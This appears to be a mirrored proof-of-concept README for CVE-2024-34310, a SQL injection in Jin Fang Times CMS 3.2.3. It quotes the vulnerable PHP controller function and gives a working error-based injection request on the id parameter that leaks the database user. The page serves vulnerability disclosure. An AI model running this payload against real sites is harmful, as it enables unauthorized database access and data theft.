CVE-2024-34310 PoC — Jin Fang Times Content Management System 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-34310

Readme

# CVE-2024-34310
CVE-2024-34310
> [Suggested description]
> Jin Fang Times Content Management System v3.2.3 was discovered to
> contain a SQL injection vulnerability via the id parameter.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.bjjfsd.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Jin Fang times content management system - 3.2.3
>
> ------------------------------------------
>
> [Affected Component]
> public function data_show($id = 0) {
>
>     if (empty($id)) {
>
>         $this->redirect('index');
>
>     }
>
>  $info = M('News')->find($id);
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
>
> ------------------------------------------
>
> [Discoverer]
> yishan
>
> ------------------------------------------
>
> [Reference]
> http://jin.com
> https://www.bjjfsd.com/

Use CVE-2024-34310.

File Snapshot

 [4.0K]  /data/pocs/79fc10752605b452bb13e4cbec3aeca48de94a5e
└── [1.3K]  README.md

0 directories, 1 file

Remarks